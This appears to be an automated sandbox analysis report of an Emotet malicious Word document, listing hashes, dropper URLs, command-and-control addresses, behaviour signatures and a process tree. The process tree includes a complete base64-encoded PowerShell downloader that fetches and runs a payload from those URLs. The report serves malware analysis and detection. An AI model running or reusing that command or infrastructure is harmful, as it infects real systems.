emotet | dc875f711c036d142c516a749754c9752e410f28c3a2223de920488093754e0b

General

Target

SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313.doc
Size

168KB
MD5

a218719fd104a4c006280fed89268170
SHA1

4a14ff4ab8445b69e5ad1960236a0c4c4b583d6e
SHA256

dc875f711c036d142c516a749754c9752e410f28c3a2223de920488093754e0b
SHA512

99b11414943e18e955451b3f7058564b88e4abb5baa79975a98dd4471826de49cb714854a32c6ca54794229e0712a0b387fb59cd98085ee3b51a25f19c04d041

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://rectificadoscarrion.com/wp-includes/EiQ/

exe.dropper

http://renekok.com/QbWyat/

exe.dropper

http://www.onlinemediadesigns.com/bin/nObh/

exe.dropper

http://renegaderadio.net/haunted/cA5zuC5/

exe.dropper

http://qatifsport.net/t/NbQq254/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1508 WINWORD.EXE
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE285.execnvfat.exe

pid process

1508 WINWORD.EXE
1508 WINWORD.EXE
564 285.exe
1916 cnvfat.exe

pid	process
1508	WINWORD.EXE

pid	process
1508	WINWORD.EXE
1508	WINWORD.EXE
564	285.exe
1916	cnvfat.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1844	1808	powersheLL.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powersheLL.execnvfat.exe

pid process

1844 powersheLL.exe
1844 powersheLL.exe
1916 cnvfat.exe
1916 cnvfat.exe
1916 cnvfat.exe
Executes dropped EXE 2 IoCs

Processes:

285.execnvfat.exe

pid process

564 285.exe
1916 cnvfat.exe

pid	process
1844	powersheLL.exe
1844	powersheLL.exe
1916	cnvfat.exe
1916	cnvfat.exe
1916	cnvfat.exe

pid	process
564	285.exe
1916	cnvfat.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

285.exe

description	pid	process	target process
PID 564 wrote to memory of 1916	564	285.exe	cnvfat.exe
PID 564 wrote to memory of 1916	564	285.exe	cnvfat.exe
PID 564 wrote to memory of 1916	564	285.exe	cnvfat.exe
PID 564 wrote to memory of 1916	564	285.exe	cnvfat.exe

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1844 powersheLL.exe
Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

4 1844 powersheLL.exe

description	pid	process
Token: SeDebugPrivilege	1844	powersheLL.exe

flow	pid	process
4	1844	powersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/564-11-0x0000000000300000-0x000000000030C000-memory.dmp	emotet
behavioral1/memory/564-11-0x0000000000300000-0x000000000030C000-memory.dmp	emotet
behavioral1/memory/1916-14-0x00000000002E0000-0x00000000002EC000-memory.dmp	emotet
behavioral1/memory/1916-14-0x00000000002E0000-0x00000000002EC000-memory.dmp	emotet

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BE3DFDFD-F8F0-43D4-B240-C573D040495C}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{BE3DFDFD-F8F0-43D4-B240-C573D040495C}\2.0\0\win32	WINWORD.EXE

Drops file in System32 directory 2 IoCs

Processes:

powersheLL.exe285.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe
File opened for modification	C:\Windows\SysWOW64\NlsLexicons000f\cnvfat.exe	285.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Modifies registry class
PID:1508

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABUAFUATwBPAEYAagBqAGQAPQAnAEoARQBPAFUAUwBkAGUAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBDAFUAUgBpAHQAeQBQAGAAUgBvAFQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEMAVQBaAFEAWgB0AHkAYQAgAD0AIAAnADIAOAA1ACcAOwAkAE4ASQBCAEMAQwBvAHMAdgA9ACcASgBPAEYASwBIAHAAdABvACcAOwAkAEcARwBNAEIAUQBiAHkAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwBVAFoAUQBaAHQAeQBhACsAJwAuAGUAeABlACcAOwAkAFMAQgBDAFMATQBmAG8AZAA9ACcASQBCAFYATABPAG0AcABuACcAOwAkAE4AVwBEAEcATAB4AHIAbwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwASQBFAG4AVAA7ACQATwBaAEQAQQBLAGcAdgBwAD0AJwBoAHQAdABwADoALwAvAHIAZQBjAHQAaQBmAGkAYwBhAGQAbwBzAGMAYQByAHIAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEUAaQBRAC8AKgBoAHQAdABwADoALwAvAHIAZQBuAGUAawBvAGsALgBjAG8AbQAvAFEAYgBXAHkAYQB0AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbwBuAGwAaQBuAGUAbQBlAGQAaQBhAGQAZQBzAGkAZwBuAHMALgBjAG8AbQAvAGIAaQBuAC8AbgBPAGIAaAAvACoAaAB0AHQAcAA6AC8ALwByAGUAbgBlAGcAYQBkAGUAcgBhAGQAaQBvAC4AbgBlAHQALwBoAGEAdQBuAHQAZQBkAC8AYwBBADUAegB1AEMANQAvACoAaAB0AHQAcAA6AC8ALwBxAGEAdABpAGYAcwBwAG8AcgB0AC4AbgBlAHQALwB0AC8ATgBiAFEAcQAyADUANAAvACcALgAiAHMAcABgAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwBTAE0AQQBOAG8AYwB1AD0AJwBEAFQARwBGAFoAcABhAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoATgBaAEkASQBpAG4AaQAgAGkAbgAgACQATwBaAEQAQQBLAGcAdgBwACkAewB0AHIAeQB7ACQATgBXAEQARwBMAHgAcgBvAC4AIgBEAE8AdwBuAGAAbABgAE8AYABBAGQAZgBJAGwAZQAiACgAJABaAE4AWgBJAEkAaQBuAGkALAAgACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAEYAVgBWAFYATgB5AGsAawA9ACcASwBYAEEAVABVAHUAZQBiACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBHAE0AQgBRAGIAeQBpACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA2ADkANQA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAGEAYABUAEUAIgAoACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAFMATgBPAFEAUwB5AGsAagA9ACcAQwBDAEcATABWAGcAawBzACcAOwBiAHIAZQBhAGsAOwAkAFcARQBPAFAARAB2AHIAeAA9ACcASwBZAE0AQQBYAHQAagBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEARgBEAFcARABvAG4AaAA9ACcARQBNAEUATgBLAGIAcQBmACcA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Drops file in System32 directory
PID:1844

C:\Users\Admin\285.exe
C:\Users\Admin\285.exe
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
PID:564

C:\Windows\SysWOW64\NlsLexicons000f\cnvfat.exe
"C:\Windows\SysWOW64\NlsLexicons000f\cnvfat.exe"
2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1916

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\285.exe

Download Submit
C:\Users\Admin\285.exe

Download Submit
C:\Windows\SysWOW64\NlsLexicons000f\cnvfat.exe

Download Submit
memory/564-11-0x0000000000300000-0x000000000030C000-memory.dmp

Filesize
48KB

Download
memory/1508-2-0x0000000008870000-0x0000000008874000-memory.dmp

Filesize
16KB

Download
memory/1508-5-0x000000000ACD0000-0x000000000ACD4000-memory.dmp

Filesize
16KB

Download
memory/1508-6-0x000000000BD50000-0x000000000BD54000-memory.dmp

Filesize
16KB

Download
memory/1916-12-0x0000000000000000-mapping.dmp

Download
memory/1916-14-0x00000000002E0000-0x00000000002EC000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads